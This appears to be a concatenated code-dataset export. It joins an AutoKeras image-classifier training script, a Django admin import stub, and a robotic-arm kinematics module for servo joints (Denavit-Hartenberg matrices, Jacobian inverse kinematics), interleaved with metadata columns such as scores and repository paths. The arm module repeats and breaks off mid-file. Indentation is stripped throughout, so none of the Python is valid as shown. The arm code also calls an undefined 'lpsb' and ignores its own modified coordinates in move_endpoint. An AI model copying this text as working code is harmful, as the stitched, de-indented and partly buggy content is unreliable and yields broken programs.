from sklearn.model_selection import train_test_split
# TODO: argparse
def load_images(file_path, size=120, is_train=True):
with open('X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/dataset_files/labels.json', 'r') as fp:
labels_dict = json.load(fp)
with open('X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/dataset_files/encoded_labels.json', 'r') as fp:
encoded_labels = json.load(fp)
Xarr = []
Yarr = []
number_of_classes = 3
files = [f for f in os.listdir(file_path) if isfile(join(file_path, f))]
files.sort()
for filename in files:
image = cv2.imread(join(file_path, filename))
# image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = cv2.resize(image, (size, size))
Xarr.append(image)
label_names = labels_dict[filename[:-4]]
each_file_labels = [0 for _ in range(number_of_classes)]
for name in label_names:
num_label = encoded_labels[name]
# each_file_labels.append(num_label)
each_file_labels[num_label] = 1
Yarr.append(each_file_labels)
Xarr = np.array(Xarr)
Yarr = np.array(Yarr)
# Xarr = Xarr.reshape(-1, size, size, 1)
return Xarr, Yarr
def load_patches(file_path='X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/Generated_dataset'):
Xtrain, Ytrain = load_images(file_path, size=120, is_train=True)
new_Ytrain = []
for y in Ytrain:
ys = np.argmax(y)
new_Ytrain.append(ys)
new_Ytrain = np.array(new_Ytrain)
Xtrain, Xval, Ytrain, Yval = train_test_split(Xtrain, new_Ytrain, random_state=1, train_size=0.8)
return (Xtrain, Ytrain), (Xval, Yval)
(x_train, y_train), (x_test, y_test) = load_patches()
x_train, x_test = x_train / 255.0, x_test / 255.0
#
# (x_train, y_train), (x_test, y_test) = mnist.load_data()
# print(x_train.shape) # (60000, 28, 28)
print(y_train.shape) # (60000,)
print(y_train[:3]) # array([7, 2, 1], dtype=uint8)
# # Initialize the image classifier.
# clf = ak.ImageClassifier(overwrite=True, max_trials=1)
# # Feed the image classifier with training data.
# clf.fit(x_train, y_train, epochs=10)
#
#
# # Predict with the best model.
# predicted_y = clf.predict(x_test)
# print(predicted_y)
#
#
# # Evaluate the best model with testing data.
# print(clf.evaluate(x_test, y_test))
clf = ak.ImageClassifier(
num_classes=3,
multi_label=False,
loss=None,
metrics=None,
max_trials=5,
directory=None,
objective="val_loss",
overwrite=False
)
# input_node = ak.ImageInput()
# output_node = ak.Normalization()(input_node)
# output_node = ak.ImageAugmentation(horizontal_flip=False)(output_node)
# output_node = ak.ResNetBlock(version="v2")(output_node)
# output_node = ak.ClassificationHead()(output_node)
# clf = ak.AutoModel(
# inputs=input_node, outputs=output_node, overwrite=True, max_trials=1
# )
clf.fit(
x_train,
y_train,
# Split the training data and use the last 15% as validation data.
validation_split=0.2,
epochs=10,
)
# Predict with the best model.
predicted_y = clf.predict(x_test)
print(predicted_y)
# Evaluate the best model with testing data.
print(clf.evaluate(x_test, y_test))
# get the best performing model
model = clf.export_model()
# summarize the loaded model
model.summary()
# save the best performing model to file
model.save('model_autokeras.h5') | en | 0.463836 | # TODO: argparse # image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # each_file_labels.append(num_label) # Xarr = Xarr.reshape(-1, size, size, 1) # # (x_train, y_train), (x_test, y_test) = mnist.load_data() # print(x_train.shape) # (60000, 28, 28) # (60000,) # array([7, 2, 1], dtype=uint8) # # Initialize the image classifier. # clf = ak.ImageClassifier(overwrite=True, max_trials=1) # # Feed the image classifier with training data. # clf.fit(x_train, y_train, epochs=10) # # # # Predict with the best model. # predicted_y = clf.predict(x_test) # print(predicted_y) # # # # Evaluate the best model with testing data. # print(clf.evaluate(x_test, y_test)) # input_node = ak.ImageInput() # output_node = ak.Normalization()(input_node) # output_node = ak.ImageAugmentation(horizontal_flip=False)(output_node) # output_node = ak.ResNetBlock(version="v2")(output_node) # output_node = ak.ClassificationHead()(output_node) # clf = ak.AutoModel( # inputs=input_node, outputs=output_node, overwrite=True, max_trials=1 # ) # Split the training data and use the last 15% as validation data. # Predict with the best model. # Evaluate the best model with testing data. # get the best performing model # summarize the loaded model # save the best performing model to file | 2.529366 | 3 |
django-rgd-geometry/rgd_geometry/admin/__init__.py | ResonantGeoData/ResonantGeoData | 40 | 6616724 | <filename>django-rgd-geometry/rgd_geometry/admin/__init__.py
from .geometry import * # noqa
| <filename>django-rgd-geometry/rgd_geometry/admin/__init__.py
from .geometry import * # noqa
| none | 1 | 1.071461 | 1 | |
t_system/motion/arm/__init__.py | sevgiun/T_System | 7 | 6616725 | <reponame>sevgiun/T_System
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: arm
:platform: Unix
:synopsis: the top-level submodule of T_System that contains the classes related to T_System's motion ability.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import numpy as np
import json
import threading
from numpy import linalg
from sympy import symbols, eye, Matrix, cos, sin, diff
from math import pi
from multipledispatch import dispatch
from t_system.motion.arm.modelisation import ArmModeler
from t_system.motion.motor import ServoMotor, ExtServoMotor
from t_system.motion import degree_to_radian, radian_to_degree
from t_system import T_SYSTEM_PATH
from t_system import log_manager
logger = log_manager.get_logger(__name__, "DEBUG")
class Joint:
"""Class to define the joint of N-axis motion arm.
This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move`
for the provide move of servo motor.
"""
def __init__(self, joint, use_ext_driver=None):
"""Initialization method of :class:`t_system.motion.arm.Joint` class.
Args:
joint (dict): The requested_data that is contain joint's properties from the config file.
use_ext_driver (bool): The flag of external PWM driver activation.
"""
self.number = joint['joint_number']
self.is_reverse = joint['reverse']
self.motor = None
self.motor_thread_stop = None
self.motor_thread_direction = None
self.motor_thread = None
self.structure = joint['structure']
self.rotation_type = joint['rotation_type']
if self.structure == 'revolute':
self.max_q = joint['max_q']
self.min_q = joint['min_q']
elif self.structure == 'prismatic':
self.max_d = joint['max_d']
self.min_d = joint['min_d']
self.d = joint['init_d']
self.q = joint['init_q']
self.a = joint['a']
self.alpha = joint['alpha']
self.use_ext_driver = use_ext_driver
self.current_angle = degree_to_radian(self.q)
if self.is_reverse:
self.current_angle = pi - self.current_angle
if self.structure != 'constant':
if self.use_ext_driver:
self.motor = ExtServoMotor(joint['channel'])
self.motor.start(round(self.current_angle, 4))
else:
self.motor = ServoMotor(joint['motor_gpio_pin'])
self.motor.start(round(self.current_angle, 4))
self.motor_thread_stop = None
self.motor_thread_direction = None
self.motor_thread = threading.Thread(target=self.motor.change_position_incregular, args=(lambda: self.motor_thread_stop, lambda: self.motor_thread_direction))
logger.info(f'Joint{self.number} started successfully. As {self.structure}, in {self.rotation_type} rotation type, on {round(self.current_angle,4)} radian.')
@dispatch(float)
def move_to_angle(self, target_angle):
"""The top-level method to provide servo motors moving.
Args:
target_angle (float): The target angle of servo motors. In radian Unit.
"""
self.motor.directly_goto_position(target_angle)
self.current_angle = target_angle
@dispatch(float, int, float)
def move_to_angle(self, target_angle, divide_count, delay):
"""The top-level method to provide servo motors moving.
Args:
target_angle (float): The target angle of servo motors. In radian Unit.
divide_count (int): The count that specify motor how many steps will use.
delay (float): delay time between motor steps.
"""
self.motor.softly_goto_position(target_angle, divide_count, delay)
self.current_angle = target_angle
@dispatch(float, bool)
def change_angle_by(self, delta_angle, direction):
"""The top-level method to provide servo motors moving.
Args:
delta_angle (float): Angle to rotate. In degree.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
target_angle = round(self.__calc_target_angle(degree_to_radian(delta_angle), direction), 5)
self.move_to_angle(target_angle)
self.current_angle = target_angle
@dispatch(float, int, float, bool)
def change_angle_by(self, delta_angle, divide_count, delay, direction):
"""The top-level method to provide servo motors moving.
Args:
delta_angle (float): Angle to rotate. In degree.
divide_count (int): The count that specify motor how many steps will use.
delay (float): delay time between motor steps.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
target_angle = round(self.__calc_target_angle(degree_to_radian(delta_angle), direction), 5)
self.move_to_angle(target_angle, divide_count, delay)
self.current_angle = target_angle
def __calc_target_angle(self, delta_angle, direction):
"""Method to calculate target angle with the given variation angle value.
Args:
delta_angle (float): Calculated theta angle for going to object position. In radian type.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
if self.is_reverse:
direction = not direction
if direction:
if self.current_angle - delta_angle < 0 or self.current_angle - delta_angle > pi:
return self.current_angle
return self.current_angle - delta_angle # this mines (-) for cw.
else:
if self.current_angle + delta_angle < 0 or self.current_angle + delta_angle > pi:
return self.current_angle
return self.current_angle + delta_angle
def stop(self):
"""Method to provide stop the GPIO.PWM services that are reserved for the joint's servo motor.
"""
self.motor.stop()
def gpio_cleanup(self):
"""Method to provide clean the GPIO pins that are reserved for the collimator's servo motor.
"""
self.motor.gpio_cleanup()
class Arm:
"""Class to define a N-axis arm for motion ability of tracking system.
This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move`
for the provide move of servo motor.
"""
def __init__(self, arm_name="Junior", use_ext_driver=False):
"""Initialization method of :class:`t_system.motion.arm.Arm` class.
Args:
arm_name (str): Name of the arm. From config file or user choice.
use_ext_driver (bool): The flag of external PWM driver activation.
"""
self.name = arm_name
self.expansion_name = f'{self.name}-Expansion'
self.__is_expanded = False
self.joints = []
self.config_file = f'{T_SYSTEM_PATH}/motion/arm/config.json'
self.joint_count = 0
self.alpha = None
self.a = None
self.q = None
self.d = None
self.dh_params = {}
self.tf_matrices_list = []
self.jacobian_matrix = None
self.current_pos_as_coord = []
self.current_pos_as_theta = []
with open(self.config_file) as conf_file:
arm_configs = json.load(conf_file)[self.name] # config file returns the arms.
self.use_ext_driver = use_ext_driver
if self.use_ext_driver:
self.use_ext_driver = arm_configs["use_ext_driver"]
self.__set_joints(arm_configs["joints"])
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
logger.info(f'{self.name} arm started successfully.')
def expand(self, current_angles=None):
"""Method to expand arm with using target_locker of t_system's vision.
Args:
current_angles (list): Current angles of the arm's expanded joints.
"""
if not self.__is_expanded:
try:
self.__is_expanded = True
self.joints.pop(-1)
with open(self.config_file) as conf_file:
expansion_joint_configs = json.load(conf_file)[self.expansion_name] # config file returns the arms.
for (i, joint_conf) in enumerate(expansion_joint_configs):
joint_conf['joint_number'] = len(self.joints) + 1
if current_angles and (joint_conf['structure'] != "constant"):
joint_conf['init_q'] = radian_to_degree(current_angles[i])
joint = Joint(joint_conf, self.use_ext_driver)
self.joints.append(joint)
if joint.structure != "constant":
self.current_pos_as_theta.append(joint.current_angle)
self.joint_count = len(self.joints)
self.__prepare_dh_params()
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
except Exception as e:
logger.warning(f'{e}')
self.__is_expanded = False
def revert_the_expand(self):
"""Method to revert back the expansion.
"""
released_angles = []
if self.__is_expanded:
try:
self.__is_expanded = False
with open(self.config_file) as conf_file:
expansion_joints = json.load(conf_file)[self.expansion_name] # config file returns the arms.
for joint in expansion_joints:
if self.joints[-1].structure != "constant":
self.joints[-1].stop()
self.joints[-1].gpio_cleanup()
released_angles.append(self.current_pos_as_theta[-1])
del self.current_pos_as_theta[-1]
del self.joints[-1]
with open(self.config_file) as conf_file:
arm = json.load(conf_file)[self.name] # config file returns the arms.
self.joints.append(Joint(arm["joints"][-1], self.use_ext_driver))
self.joint_count = len(self.joints)
self.__prepare_dh_params()
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
except Exception as e:
logger.warning(f'{e}')
released_angles = [None, None]
self.__is_expanded = True
return released_angles
def is_expanded(self):
"""Method to return expansion flag of the arm.
"""
return self.__is_expanded
def __set_joints(self, joint_configs):
"""Method to setting joints with D-H parameters.
Args:
joint_configs (list): The joint list from the config file.
"""
self.joint_count = len(joint_configs)
for joint_conf in joint_configs:
joint = Joint(joint_conf, self.use_ext_driver)
self.joints.append(joint)
if joint.structure != "constant":
self.current_pos_as_theta.append(joint.current_angle)
self.__prepare_dh_params()
def __pull_model(self):
"""Method to pull arm D-H model from database via an ArmModeller instance.
"""
model = ArmModeler().get(self.name)
if model:
logger.debug("model creating...")
self.alpha = model["alpha"]
self.a = model["a"]
self.q = model["q"]
self.d = model["d"]
self.dh_params = model["dh_params"]
self.tf_matrices_list = model["transform_matrices"]
self.jacobian_matrix = model["jacobian_matrix"]
else:
ArmModeler().create(self.name)
self.__pull_model()
def __prepare_dh_params(self):
"""Method to preparing D-H parameters of Arm.
"""
self.alpha = symbols('alpha0:' + str(self.joint_count))
self.a = symbols('a0:' + str(self.joint_count))
self.q = symbols('q1:' + str(self.joint_count + 1))
self.d = symbols('d1:' + str(self.joint_count + 1))
def __set_dh_params(self, joints):
"""Method to setting joint's D-H parameters.
Args:
joints (list): The arm's joints list for preparing parameters of Denavit-Hartenberg chart.
"""
self.dh_params = {}
for i in range(len(joints)):
self.dh_params[self.alpha[i]] = joints[i].alpha
self.dh_params[self.a[i]] = joints[i].a
if joints[i].structure == 'revolute':
self.dh_params[self.q[i]] = self.q[i]
self.dh_params[self.d[i]] = joints[i].d
elif joints[i].structure == 'prismatic':
self.dh_params[self.q[i]] = joints[i].q
self.dh_params[self.d[i]] = self.d[i]
elif joints[i].structure == 'constant':
self.dh_params[self.q[i]] = joints[i].q
self.dh_params[self.d[i]] = joints[i].d
self.__set_transform_matrices()
def show_dh_params(self):
"""Method to getting D-H parameters of joints of Arm as string message.
"""
print(f'DH Parameters are: {self.dh_params}')
def __set_transform_matrices(self):
"""Method to setting D-H transform matrices.
"""
self.tf_matrices_list = []
transform_matrix = eye(4) # creates a unit matrix via passing argument.
for i in range(self.joint_count):
transform_matrix = transform_matrix * self.__create_tf_matrix(self.alpha[i], self.a[i], self.d[i], self.q[i]).subs(self.dh_params)
self.tf_matrices_list.append(transform_matrix)
def show_transform_matrices(self):
"""Method to getting D-H parameters of joints of Arm as string message.
"""
print(f'Transform Matrices are: {self.tf_matrices_list}')
@staticmethod
def __create_tf_matrix(alpha, a, d, q):
"""Method to calculate transform matrix of Denavit-Hartenberg Method.
Args:
alpha: The twist angle. Axis angle between consecutive two axes.
a: The limb length between consecutive two axis.
d: link offset. The displacement along the same axis.
q: The rotation theta angle about the joint axis.
Returns:
object: The Denavit-Hartenberg transform matrix object.
"""
tf_matrix = Matrix([[cos(q), -sin(q), 0., a],
[sin(q) * cos(alpha), cos(q) * cos(alpha), -sin(alpha), -sin(alpha) * d],
[sin(q) * sin(alpha), cos(q) * sin(alpha), cos(alpha), cos(alpha) * d],
[0., 0., 0., 1.]])
return tf_matrix
@staticmethod
def get_coords_from_forward_kinematics(forward_kinematics_result):
"""Method to get cartesian coords from calculated forward kinematics result of the Arm.
Args:
forward_kinematics_result (list): result of the forward kinematics calculation.
Returns:
list: The cartesian coordinate position of Arm's farthest point as millimeter list.
"""
return [current_pos[0] for current_pos in forward_kinematics_result]
def __forward_kinematics(self, theta_list):
"""Method to calculate forward kinematics of the Arm.
Args:
theta_list (list): The list of current joints angles.
Returns:
list: The cartesian coordinate position of Arm's farthest point as theta list.
"""
to_current_pos = []
theta_dict = {}
tf_matrix_first_to_last = self.tf_matrices_list[-1]
for i in range(len(theta_list)):
theta_dict[self.q[i]] = theta_list[i]
theta_dict[self.q[-1]] = self.q[-1]
temp = tf_matrix_first_to_last.evalf(subs=theta_dict, chop=True, maxn=4)
x = [np.array(temp[0, -1]).astype(np.float64)]
y = [np.array(temp[1, -1]).astype(np.float64)]
z = [np.array(temp[2, -1]).astype(np.float64)]
to_current_pos.append(np.array([x, y, z]))
return to_current_pos # to_current_pos is something like [[22], [23], [20]]
def __calc_jacobian_matrix(self):
"""Method to calculate jacobian matrix of Arm's General Denavit-Hartenberg Transform Matrix.
"""
tf_matrix_first_to_last = self.tf_matrices_list[-1]
self.jacobian_matrix = [diff(tf_matrix_first_to_last[:3, -1], self.q[i]).reshape(1, 3) for i in range(len(self.q))]
self.jacobian_matrix = Matrix(self.jacobian_matrix).T # .T returns the transpose of matrix.
def __inverse_kinematics(self, guess, target_point):
"""Method to calculate inverse kinematics of the Arm.
Args:
guess: The twist angle. Axis angle between consecutive two axes.
target_point (list): Target point's coordinates as X, Y, Z respectively.
Returns:
list: The angular position list of joints by the target point. (unit: radian)
"""
error = 1.0
tolerance = 0.05
# Initial Guess - Joint Angles
thetas = np.matrix(guess) # thetas is list which is contain all axes theta angles.
target_point = np.matrix(target_point) # X, Y, Z list to matrix for Target Position
# print(target_point.shape)
# Jacobian
self.__calc_jacobian_matrix()
tf_matrix_first_to_last = self.tf_matrices_list[-1]
error_grad = []
theta_dict = {}
lr = 0.2
while error > tolerance:
for i in range(len(np.array(thetas)[0])):
theta_dict[self.q[i]] = np.array(thetas)[0][i]
theta_dict[self.q[-1]] = self.q[-1]
calculated_target_point = np.matrix(self.get_coords_from_forward_kinematics(self.__forward_kinematics(np.array(thetas)[0])[-1]))
logger.debug(f'calculated target point is \n{calculated_target_point}')
diff_wanted_calculated = target_point - calculated_target_point
jacob_mat = np.matrix(self.jacobian_matrix.evalf(subs=theta_dict, chop=True, maxn=4)).astype(np.float64).T
logger.debug(f'jacobian matrix is\n{jacob_mat} \n\n diff is \n {diff_wanted_calculated}')
thetas = thetas + lr * (jacob_mat * diff_wanted_calculated.T)
# thetas = np.array(thetas)[0] # this line's purpose is changing Q from matrix level to array level.
prev_error = error
error = linalg.norm(diff_wanted_calculated)
if error > 10 * tolerance:
lr = 0.3
elif error < 10 * tolerance:
lr = 0.2
error_grad.append((error - prev_error))
# print(error)
return np.array(thetas)[0]
def path_plan(self, guess, target_list, time, acceleration):
Q_list = []
for target in target_list:
Q = self.__inverse_kinematics(guess, target)
predicted_coordinates = self.__forward_kinematics(Q)[-1]
logger.info(f'Target: {target} , Predicted: {predicted_coordinates}')
Q_list.append(Q)
guess = Q
# print(np.matrix(Q_list), np.matrix(Q_list).shape)
Q_matrix = np.matrix(Q_list)
theta_all, omega_all, acceleration_all = lpsb.trajectory_planner(Q_matrix, time, acceleration, 0.01)
return Q_list
def goto_position(self, polar_params=None, cartesian_coords=None):
"""Method to go to given position via position angles or coordinates of the Arm.
If the target position is given with angles, cartesian coordinates have been created,
else cartesian coordinates given the joints angles create.
Args:
polar_params (dict): Angular position dictionary to go. Keeps theta, divide_count and delay lists and the length of this lists equals to joint count.
cartesian_coords (list): Cartesian position list to go. List length equals to 3 for 3 dimensions of the cartesian coordinate system.
"""
if cartesian_coords and polar_params:
self.__rotate_joints(polar_params)
elif polar_params:
self.__rotate_joints(polar_params)
cartesian_coords = self.get_coords_from_forward_kinematics(self.__forward_kinematics(polar_params["coords"])[-1])
elif cartesian_coords:
polar_params["coords"] = self.__inverse_kinematics([0, 0, 0], cartesian_coords)
self.__rotate_joints(polar_params)
else:
raise Exception('Going to position requires angle or coordinate!')
self.current_pos_as_theta = []
self.current_pos_as_coord = []
for coord in polar_params["coords"]:
self.current_pos_as_theta.append(coord)
for coord in cartesian_coords:
self.current_pos_as_coord.append(coord)
@dispatch(list)
def __rotate_joints(self, pos_thetas):
"""Method to rotate all joints according to given position theta angles.
Args:
pos_thetas (list): Angular position list to go. List length equals to joint count.
"""
joint_threads = []
for joint in self.joints:
if joint.structure != "constant":
joint_thread = threading.Thread(target=joint.move_to_angle, args=(float(pos_thetas[joint.number - 1]),))
joint_threads.append(joint_thread)
joint_thread.start()
return self.__check_until_threads_ends(joint_threads)
@dispatch(dict)
def __rotate_joints(self, polar_params):
"""Method to rotate all joints according to given position theta angles.
Args:
polar_params (dict): Angular position list to go. List length equals to joint count.
"""
joint_threads = []
for joint in self.joints:
if joint.structure != "constant":
joint_thread = threading.Thread(target=joint.move_to_angle, args=(polar_params["coords"][joint.number - 1], int(polar_params["divide_counts"][joint.number - 1]), float(polar_params["delays"][joint.number - 1])))
joint_threads.append(joint_thread)
joint_thread.start()
# for joint_thread in joint_threads:
# joint_thread.start()
return self.__check_until_threads_ends(joint_threads)
def rotate_joints(self, pan_params, tilt_params):
"""Method to rotate all joints according to given position theta angles.
Args:
pan_params (dict): Control parameters for pan rotation joints.
tilt_params (dict): Control parameters for tilt rotation joints.
"""
for joint in self.joints:
if joint.structure != 'constant':
thread_direction = None
if joint.rotation_type == "pan":
thread_direction = pan_params["direction"]
joint.motor_thread_stop = pan_params["stop"]
elif joint.rotation_type == "tilt":
thread_direction = tilt_params["direction"]
joint.motor_thread_stop = tilt_params["stop"]
if not joint.is_reverse:
joint.motor_thread_direction = not thread_direction
else:
joint.motor_thread_direction = thread_direction
if joint.motor_thread.is_alive():
pass
else:
if not joint.motor_thread_stop:
joint.motor_thread = threading.Thread(target=joint.motor.change_position_incregular, args=(lambda: joint.motor_thread_stop, lambda: joint.motor_thread_direction, 3))
joint.motor_thread.start()
@staticmethod
def __check_until_threads_ends(threads):
"""Method to check given threads recursively until all of them ends.
Args:
threads (list): Thread list that been checked.
"""
for thread in threads:
if thread.is_alive():
thread.join()
return True
def rotate_single_joint(self, joint_number, delta_angle, direction=None):
"""Method to move a single joint towards the given direction with the given variation.
Args:
joint_number (int): Number of one of arm's joints.
delta_angle (float): Angle to rotate. In degree.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
if direction is None:
direction = False
if delta_angle <= 0:
direction = True
delta_angle = abs(delta_angle)
for i in range(len(self.joints)):
if self.joints[i].structure != "constant":
if self.joints[i].number == joint_number:
self.joints[i].change_angle_by(float(delta_angle), direction)
try:
self.current_pos_as_theta[i] = self.joints[i].current_angle
except IndexError:
logger.critical(f'current_pos_as_theta list of Arm has IndexError!')
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
def move_endpoint(self, axis, distance):
"""Method to move endpoint of the arm with the given axis and the distance.
Args:
axis (str): Number of one of arm's joints.
distance (int): Moving distance.
"""
current_pos_as_coord = self.current_pos_as_coord
cartesian_coords = {"x": current_pos_as_coord[0], "y": current_pos_as_coord[1], "z": current_pos_as_coord[2]}
cartesian_coords[axis] += distance
self.goto_position(cartesian_coords=current_pos_as_coord)
def get_current_positions(self):
"""Method to send current positions.
Returns:
dict: Response
"""
self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
return {"cartesian_coords": self.current_pos_as_coord, "polar_coords": self.current_pos_as_theta}
def ang_diff(self, theta1, theta2):
"""
Returns the difference between two angles in the range -pi to +pi
"""
return (theta1 - theta2 + np.pi) % (2 * np.pi) - np.pi
| #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: arm
:platform: Unix
:synopsis: the top-level submodule of T_System that contains the classes related to T_System's motion ability.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import numpy as np
import json
import threading
from numpy import linalg
from sympy import symbols, eye, Matrix, cos, sin, diff
from math import pi
from multipledispatch import dispatch
from t_system.motion.arm.modelisation import ArmModeler
from t_system.motion.motor import ServoMotor, ExtServoMotor
from t_system.motion import degree_to_radian, radian_to_degree
from t_system import T_SYSTEM_PATH
from t_system import log_manager
logger = log_manager.get_logger(__name__, "DEBUG")
class Joint:
"""Class to define the joint of N-axis motion arm.
This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move`
for the provide move of servo motor.
"""
def __init__(self, joint, use_ext_driver=None):
"""Initialization method of :class:`t_system.motion.arm.Joint` class.
Args:
joint (dict): The requested_data that is contain joint's properties from the config file.
use_ext_driver (bool): The flag of external PWM driver activation.
"""
self.number = joint['joint_number']
self.is_reverse = joint['reverse']
self.motor = None
self.motor_thread_stop = None
self.motor_thread_direction = None
self.motor_thread = None
self.structure = joint['structure']
self.rotation_type = joint['rotation_type']
if self.structure == 'revolute':
self.max_q = joint['max_q']
self.min_q = joint['min_q']
elif self.structure == 'prismatic':
self.max_d = joint['max_d']
self.min_d = joint['min_d']
self.d = joint['init_d']
self.q = joint['init_q']
self.a = joint['a']
self.alpha = joint['alpha']
self.use_ext_driver = use_ext_driver
self.current_angle = degree_to_radian(self.q)
if self.is_reverse:
self.current_angle = pi - self.current_angle
if self.structure != 'constant':
if self.use_ext_driver:
self.motor = ExtServoMotor(joint['channel'])
self.motor.start(round(self.current_angle, 4))
else:
self.motor = ServoMotor(joint['motor_gpio_pin'])
self.motor.start(round(self.current_angle, 4))
self.motor_thread_stop = None
self.motor_thread_direction = None
self.motor_thread = threading.Thread(target=self.motor.change_position_incregular, args=(lambda: self.motor_thread_stop, lambda: self.motor_thread_direction))
logger.info(f'Joint{self.number} started successfully. As {self.structure}, in {self.rotation_type} rotation type, on {round(self.current_angle,4)} radian.')
@dispatch(float)
def move_to_angle(self, target_angle):
"""The top-level method to provide servo motors moving.
Args:
target_angle (float): The target angle of servo motors. In radian Unit.
"""
self.motor.directly_goto_position(target_angle)
self.current_angle = target_angle
@dispatch(float, int, float)
def move_to_angle(self, target_angle, divide_count, delay):
"""The top-level method to provide servo motors moving.
Args:
target_angle (float): The target angle of servo motors. In radian Unit.
divide_count (int): The count that specify motor how many steps will use.
delay (float): delay time between motor steps.
"""
self.motor.softly_goto_position(target_angle, divide_count, delay)
self.current_angle = target_angle
@dispatch(float, bool)
def change_angle_by(self, delta_angle, direction):
"""The top-level method to provide servo motors moving.
Args:
delta_angle (float): Angle to rotate. In degree.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
target_angle = round(self.__calc_target_angle(degree_to_radian(delta_angle), direction), 5)
self.move_to_angle(target_angle)
self.current_angle = target_angle
@dispatch(float, int, float, bool)
def change_angle_by(self, delta_angle, divide_count, delay, direction):
"""The top-level method to provide servo motors moving.
Args:
delta_angle (float): Angle to rotate. In degree.
divide_count (int): The count that specify motor how many steps will use.
delay (float): delay time between motor steps.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
target_angle = round(self.__calc_target_angle(degree_to_radian(delta_angle), direction), 5)
self.move_to_angle(target_angle, divide_count, delay)
self.current_angle = target_angle
def __calc_target_angle(self, delta_angle, direction):
"""Method to calculate target angle with the given variation angle value.
Args:
delta_angle (float): Calculated theta angle for going to object position. In radian type.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
if self.is_reverse:
direction = not direction
if direction:
if self.current_angle - delta_angle < 0 or self.current_angle - delta_angle > pi:
return self.current_angle
return self.current_angle - delta_angle # this mines (-) for cw.
else:
if self.current_angle + delta_angle < 0 or self.current_angle + delta_angle > pi:
return self.current_angle
return self.current_angle + delta_angle
def stop(self):
"""Method to provide stop the GPIO.PWM services that are reserved for the joint's servo motor.
"""
self.motor.stop()
def gpio_cleanup(self):
"""Method to provide clean the GPIO pins that are reserved for the collimator's servo motor.
"""
self.motor.gpio_cleanup()
class Arm:
"""Class to define a N-axis arm for motion ability of tracking system.
This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move`
for the provide move of servo motor.
"""
def __init__(self, arm_name="Junior", use_ext_driver=False):
"""Initialization method of :class:`t_system.motion.arm.Arm` class.
Args:
arm_name (str): Name of the arm. From config file or user choice.
use_ext_driver (bool): The flag of external PWM driver activation.
"""
self.name = arm_name
self.expansion_name = f'{self.name}-Expansion'
self.__is_expanded = False
self.joints = []
self.config_file = f'{T_SYSTEM_PATH}/motion/arm/config.json'
self.joint_count = 0
self.alpha = None
self.a = None
self.q = None
self.d = None
self.dh_params = {}
self.tf_matrices_list = []
self.jacobian_matrix = None
self.current_pos_as_coord = []
self.current_pos_as_theta = []
with open(self.config_file) as conf_file:
arm_configs = json.load(conf_file)[self.name] # config file returns the arms.
self.use_ext_driver = use_ext_driver
if self.use_ext_driver:
self.use_ext_driver = arm_configs["use_ext_driver"]
self.__set_joints(arm_configs["joints"])
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
logger.info(f'{self.name} arm started successfully.')
def expand(self, current_angles=None):
"""Method to expand arm with using target_locker of t_system's vision.
Args:
current_angles (list): Current angles of the arm's expanded joints.
"""
if not self.__is_expanded:
try:
self.__is_expanded = True
self.joints.pop(-1)
with open(self.config_file) as conf_file:
expansion_joint_configs = json.load(conf_file)[self.expansion_name] # config file returns the arms.
for (i, joint_conf) in enumerate(expansion_joint_configs):
joint_conf['joint_number'] = len(self.joints) + 1
if current_angles and (joint_conf['structure'] != "constant"):
joint_conf['init_q'] = radian_to_degree(current_angles[i])
joint = Joint(joint_conf, self.use_ext_driver)
self.joints.append(joint)
if joint.structure != "constant":
self.current_pos_as_theta.append(joint.current_angle)
self.joint_count = len(self.joints)
self.__prepare_dh_params()
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
except Exception as e:
logger.warning(f'{e}')
self.__is_expanded = False
def revert_the_expand(self):
"""Method to revert back the expansion.
"""
released_angles = []
if self.__is_expanded:
try:
self.__is_expanded = False
with open(self.config_file) as conf_file:
expansion_joints = json.load(conf_file)[self.expansion_name] # config file returns the arms.
for joint in expansion_joints:
if self.joints[-1].structure != "constant":
self.joints[-1].stop()
self.joints[-1].gpio_cleanup()
released_angles.append(self.current_pos_as_theta[-1])
del self.current_pos_as_theta[-1]
del self.joints[-1]
with open(self.config_file) as conf_file:
arm = json.load(conf_file)[self.name] # config file returns the arms.
self.joints.append(Joint(arm["joints"][-1], self.use_ext_driver))
self.joint_count = len(self.joints)
self.__prepare_dh_params()
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
except Exception as e:
logger.warning(f'{e}')
released_angles = [None, None]
self.__is_expanded = True
return released_angles
def is_expanded(self):
"""Method to return expansion flag of the arm.
"""
return self.__is_expanded
def __set_joints(self, joint_configs):
